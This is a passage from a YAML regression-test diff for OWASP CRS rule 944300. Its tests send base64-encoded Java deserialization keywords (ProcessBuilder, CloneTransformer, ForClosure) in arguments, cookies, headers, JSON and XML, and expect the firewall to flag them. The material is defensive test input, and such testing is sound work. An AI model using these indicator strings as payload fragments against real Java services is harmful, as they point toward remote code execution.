"HByb2Nlc3NidWlsZGVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-53 + desc: "Content-Type text/plain includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=HByb2Nlc3NidWlsZGVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-54 + desc: "Content-Type application/json arg value includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: 
"localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"HByb2Nlc3NidWlsZGVy\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-55 + desc: "Content-Type application/json arg name includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"HByb2Nlc3NidWlsZGVy\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-56 + desc: "Argument test includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Bwcm9jZXNzYnVpbGRlcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-57 + desc: "Argument name includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm9jZXNzYnVpbGRlcg=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-58 + desc: "Cookie test includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bwcm9jZXNzYnVpbGRlcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-59 + desc: "Cookie name includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bwcm9jZXNzYnVpbGRlcg=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-60 + desc: "Request header test includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bwcm9jZXNzYnVpbGRlcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-61 + desc: "XML attribute value includes 
keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-62 + desc: "XML element value includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm9jZXNzYnVpbGRlcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-63 + desc: "Nested XML element value includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm9jZXNzYnVpbGRlcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-64 + desc: "Content-Type text/plain includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Bwcm9jZXNzYnVpbGRlcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-65 + desc: "Content-Type application/json arg value includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Bwcm9jZXNzYnVpbGRlcg\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-66 + desc: "Content-Type application/json arg name includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Bwcm9jZXNzYnVpbGRlcg\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-67 + desc: "Argument test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-68 + desc: "Argument name includes keyword 
Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Y2xvbmV0cmFuc2Zvcm1lcg=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-69 + desc: "Cookie test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Y2xvbmV0cmFuc2Zvcm1lcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-70 + desc: "Cookie name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Y2xvbmV0cmFuc2Zvcm1lcg=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-71 + desc: "Request header test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Y2xvbmV0cmFuc2Zvcm1lcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-72 + desc: "XML attribute value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-73 + desc: "XML element value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-74 + desc: "Nested XML element value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Y2xvbmV0cmFuc2Zvcm1lcg" + output: 
+ log_contains: "id \"944300\"" + - test_title: 944300-75 + desc: "Content-Type text/plain includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-76 + desc: "Content-Type application/json arg value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Y2xvbmV0cmFuc2Zvcm1lcg\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-77 + desc: "Content-Type application/json arg name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Y2xvbmV0cmFuc2Zvcm1lcg\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-78 + desc: "Argument test includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP 
CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=GNsb25ldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-79 + desc: "Argument name includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "GNsb25ldHJhbnNmb3JtZXI=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-80 + desc: "Cookie test includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=GNsb25ldHJhbnNmb3JtZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-81 + desc: "Cookie name includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + 
Cookie: GNsb25ldHJhbnNmb3JtZXI=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-82 + desc: "Request header test includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: GNsb25ldHJhbnNmb3JtZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-83 + desc: "XML attribute value includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-84 + desc: "XML element value includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "GNsb25ldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-85 + desc: "Nested XML element value includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" 
+ port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "GNsb25ldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-86 + desc: "Content-Type text/plain includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=GNsb25ldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-87 + desc: "Content-Type application/json arg value includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"GNsb25ldHJhbnNmb3JtZXI\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-88 + desc: "Content-Type application/json arg name includes keyword GNsb25ldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"GNsb25ldHJhbnNmb3JtZXI\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-89 + desc: "Argument test includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=BjbG9uZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-90 + desc: "Argument name includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "BjbG9uZXRyYW5zZm9ybWVy=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-91 + desc: "Cookie test includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BjbG9uZXRyYW5zZm9ybWVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-92 + desc: "Cookie name includes keyword 
BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BjbG9uZXRyYW5zZm9ybWVy=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-93 + desc: "Request header test includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BjbG9uZXRyYW5zZm9ybWVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-94 + desc: "XML attribute value includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-95 + desc: "XML element value includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BjbG9uZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-96 + desc: "Nested XML element value includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BjbG9uZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-97 + desc: "Content-Type text/plain includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=BjbG9uZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-98 + desc: "Content-Type application/json arg value includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": 
\"BjbG9uZXRyYW5zZm9ybWVy\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-99 + desc: "Content-Type application/json arg name includes keyword BjbG9uZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"BjbG9uZXRyYW5zZm9ybWVy\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-100 + desc: "Argument test includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Zm9yY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-101 + desc: "Argument name includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Zm9yY2xvc3VyZQ=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-102 + desc: "Cookie test includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: 